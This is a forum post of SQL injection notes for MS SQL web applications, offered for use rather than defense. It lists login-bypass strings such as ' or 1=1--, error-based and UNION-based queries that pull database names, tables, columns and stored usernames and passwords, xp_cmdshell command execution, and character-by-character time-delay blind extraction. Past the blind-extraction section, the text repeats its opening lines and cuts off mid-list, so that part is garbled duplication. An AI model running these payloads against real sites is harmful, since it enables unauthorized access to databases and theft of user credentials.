SQL Injection Notes
14 views
Skip to first unread message
Joe
Jan 8, 2008, 5:28:58 AM1/8/08
to EVIL SQL INJECTION - www.evilsql.com
Here are my SQL Injection Notes. My goal is to marry my notes, and the
new notes I've made from the evilsql.com site. I think the combination
of the 2 sets of notes is going to help to make something that is
pretty good and usable. My concern right now is that neither one of us
really has anything for dealing with quoted sql injection, nor do
either one of us really cover the differences between SQL2K and
SQL2K5.
Hope this helps....
########################
# What you should look for #
########################
Try to look for pages that allow you to submit data (i.e: login page,
search page, feedback, etc).
Sometimes, HTML pages will use the POST command to send parameters to
another ASP page. Therefore, you may not see the parameters in the
URL.
However, you can check the source code of the HTML, and look for
"FORM" tag in
the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters
that might
be useful (exploit wise).
############################################
# What if you can't find any page that takes input? #
############################################
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to
look
especially for URL that takes parameters, like:
http://site.com/index.asp?id=10
################################
# How do you test if it is vulnerable? #
################################
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
or
- http://site.com/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML
from
the site, save it in your hard disk, modify the URL and hidden field
accordingly. Example:
<FORM action=http://site.com/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or
password.
You can also do this with a local proxy like Paros or WebScarab.
##########################
# What are some things to try #
##########################
View source code and look for any parameters being passed to the
website
- Save the page locally
* Substitute any variable being passed to the website with your sqli
* Example variables:
- username/passwords
- check boxes
- radial buttons
- cookie data
- session data
- referrer
- Use a local proxy to substitute the vars with your injection
* Example variables:
- username/passwords
- check boxes
- radial buttons
- cookie data
- session data
- referrer
Some examples injections you can use are:
'
"
;
#
##
%00
--
admin:' or a=a--
admin:' or 1=1--
admin'--
*'") OR ("'* --
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
##############################
# Determine if it is direct or quoted #
##############################
The first error that you are normally confronted with is the syntax
error. A syntax error
indicates that the query does not conform to the proper structure of
an SQL query. The first
thing that you need to figure out is whether injection is possible
without escaping quotation.
Direct
In a direct injection, whatever argument you submit will be used in
the SQL query
without any modification. Try taking the parameter's legitimate value
and appending a space
and the word "OR" to it. If that generates an error, direct injection
is possible.
Quoted
All other instances are quoted injection vulnerabilities. In a quoted
injection, whatever
argument you submit has a quote prepended and appended to it by the
application.
In order to break out of the quotes and manipulate the query while
maintaining valid
syntax, your injection string must contain a single quote before you
use an SQL keyword, and
end in a WHERE statement that needs a quote appended to it.
##############################
# Number of columns enumeration #
##############################
Using 'Order by' to determine the number of columns in a given query
string for use with blind sql injection:
http://www.example.com/index.php?newsid=394 order by 100/*
When we pass 100, it should say "unknown column in order by clause".
We use the process of elimination to determine the number of columns.
Next we would halve the number.
http://www.example.com/index.php?newsid=394 order by 50/*
Again we would get an error. Lets try something like...10
http://www.example.com/index.php?newsid=394 order by 10/*
When we do the number 10, the query completes just fine. We are close,
but there might be more.
http://www.example.com/index.php?newsid=394 order by 15/*
Another error in the order by clause. We know there is more than 10,
but less than 15.
http://www.example.com/index.php?newsid=394 order by 12/*
This passed just fine. Might be more, lets test.
http://www.example.com/index.php?newsid=394 order by 13/*
Error. This means we have 12 columns. Now we are ready for some blind
SQL injection. The reason for doing this is because the union select
query must have the same number of columns when selecting from a
query. Now we run the following on the site and start testing for some
table names:
http://www.example.com/index.php?newsid=null UNION ALL SELECT
1,2,3,4,5,6,7,8,9,0,1,2,3 FROM tablename/*
##########################################
# MS SQL Table, and column name enumeration #
##########################################
Note: All of the table enumeration injections listed below may or may
not require the ('). Be sure to try both. I seem to have more luck
without the (').
Example:
http://www.site.com/article.asp?id=1' having 1=1--
or
http://www.site.com/article.asp?id=1 having 1=1--
' having 1=1--
This query needs the GROUP BY operator, and should return an error
that includes a column name.
' group by table_name.column_name1 having 1=1--
This should also return an error that includes another column name. So
you just repeat the process.
' group by table_name.column_name1, table_name.column_name2 having
1=1--
This should also return an error that includes another column name. So
you just repeat the process.
' group by table_name.column_name1, table_name.column_name3,
table_name.column_name2 having 1=1--
You just keep doing this until you no longer receive errors that
include the column name.
#########################
# Column Type Enumeration #
#########################
' union select sum(column_name1) from table_name --
Look at error message to determine if data is int, or varchar.
' union select sum(column_name2) from table_name --
Look at error message to determine if data is int, or varchar.
' union select sum(column_name3) from table_name --
Look at error message to determine if data is int, or varchar.
############################
# MS SQL Stored Procedures #
############################
'; exec sp_makewebtask "c:\Inetpub\wwwroot\evil.htm", select * from
table_name";--
This should dump the contents of table_name providing you have write
access in order to create the webpage.
' or 1=1; exec master..xp_cmdshell '"ipconfig" > c:\Inetpub\wwwroot
\ip.txt';--
Then browse to the text file.
#############################
# Inference Based SQL Injection #
#############################
Note: The waitfor+delay operator seems to work best for me when used
like this:
http://www.site.com/article.asp?id=;waitfor+delay+'0:0:5';--
;waitfor+delay+'0:0:5';--
See if it takes 5 seconds to return the page. If it does, then you can
ask it questions.
;if+not(substring((select+@@version),%,1)+<>+5)+waitfor+delay
+'0:0:5';--
Ask it if he is running SQL Server 2000
;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Ask it if it's running as 'sa'
;if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--
Ask it if the current user a member of the sysadmin group
===================================================================
Summary of notes from evilsql.com
####################################
# MS-SQL INJECTION Basic DETECTION #
####################################
Integer Injection:
http://[site]/page.asp?id=1 having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
String Injection:
http://[site]/page.asp?id=x' having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
ERROR SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.
ERROR SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))--
Syntax error converting the nvarchar value '[DB NAME]' to a column of
data type int.
ERROR SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--
Syntax error converting the nvarchar value '[DB VERSION]' to a column
of data type int.
ERROR SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--
Syntax error converting the nvarchar value '[SERVER NAME]' to a column
of data type int.
ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85)))--
Syntax error converting the nvarchar value '[TABLE NAME 1]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--
Syntax error converting the nvarchar value '[TABLE NAME 2]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from
sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--
Syntax error converting the nvarchar value '[TABLE NAME 3]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1'))--
Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--
Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1
column_name from DBNAME.information_schema.columns where
table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--
Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-1 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-2 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-3 from TABLE-NAME-1))--
Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a
column of data type int.
ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE')
order by COLUMN-NAME-1 desc))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND
ROW]' to a column of data type int.
ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-
NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE')
order by COLUMN-NAME-1 desc))--
Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD
ROW]' to a column of data type int.
##########################
# MS-SQL UNION Injection #
##########################
UNION SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from
sysobjects where xtype=char(85)--
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from
DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from
TABLE-NAME-1--
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from
TABLE-NAME-1--
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from
TABLE-NAME-1--
[FIELD 3 VALUE]
##########################
# MS-SQL Blind Injection #
##########################
BLIND SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)
String Injection:
http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)
BLIND SQL INJECTION - EXTRACT DATABASE USER
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY
'00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY
'00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
D - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=98) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=99) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),
3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Database User = DBO
BLIND SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),
8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Database Name = PRO-DB-1
BLIND SQL INJECTION - EXTRACT 1st DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype='U')=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
Table Name = USERS
BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
1,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
3,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
4,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
5,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'USERS'),
6,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table Name = ORDERS
BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
1,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
5,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
6,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
7,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
8,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
NAME from sysobjects where xtype=char(85) and name>'ORDERS'),
9,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Table Name = CUSTOMERS
BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-
DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR
DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10
seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10
seconds)
Column Name = USER
BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-
DB-1.information_schema.columns where table_name='USERS' and
column_name>'USER')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
Column Name = PASS
BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-
DB-1.information_schema.columns where table_name='USERS' and
column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
column_name from PRO-DB-1.information_schema.columns where
table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
Column Name = ID
BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER
from USERS),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = ADMIN
BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),2,1))=50) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS
from USERS),3,1))=51) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = 123
BLIND SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID from USERS)=3)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),2,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID
from USERS),3,1))=48) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = 100
BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS
where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
2,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('ADMIN') order by USER desc),
3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = JOE
BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS
where USER NOT in ('JOE') order by USERS desc)=3) WAITFOR DELAY
'00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
2,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1
USER from USERS where USER NOT in ('JOE') order by USER desc),
3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field Data = JIM
new notes I've made from the evilsql.com site. I think the combination
of the 2 sets of notes is going to help to make something that is
pretty good and usable. My concern right now is that neither one of us
really has anything for dealing with quoted sql injection, nor do
either one of us really cover the differences between SQL2K and
SQL2K5.
Hope this helps....
########################
# What you should look for #
########################
Try to look for pages that allow you to submit data (i.e: login page,
search page, feedback, etc).
Sometimes, HTML pages will use the POST command to send parameters to
another ASP page. Therefore, you may not see the parameters in the
URL.
However, you can check the source code of the HTML, and look for
"FORM" tag in
the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters
that might
be useful (exploit wise).
############################################
# What if you can't find any page that takes input? #
############################################
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to
look
especially for URL that takes parameters, like:
http://site.com/index.asp?id=10
################################
# How do you test if it is vulnerable? #
################################
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
or
- http://site.com/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML
from
the site, save it in your hard disk, modify the URL and hidden field
accordingly. Example:
<FORM action=http://site.com/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or
password.
You can also do this with a local proxy like Paros or WebScarab.
##########################
# What are some things to try #
##########################
View source code and look for any parameters being passed to the
website
- Save the page locally
* Substitute any variable being passed to the website with your sqli
* Example variables:
- username/passwords
- check boxes
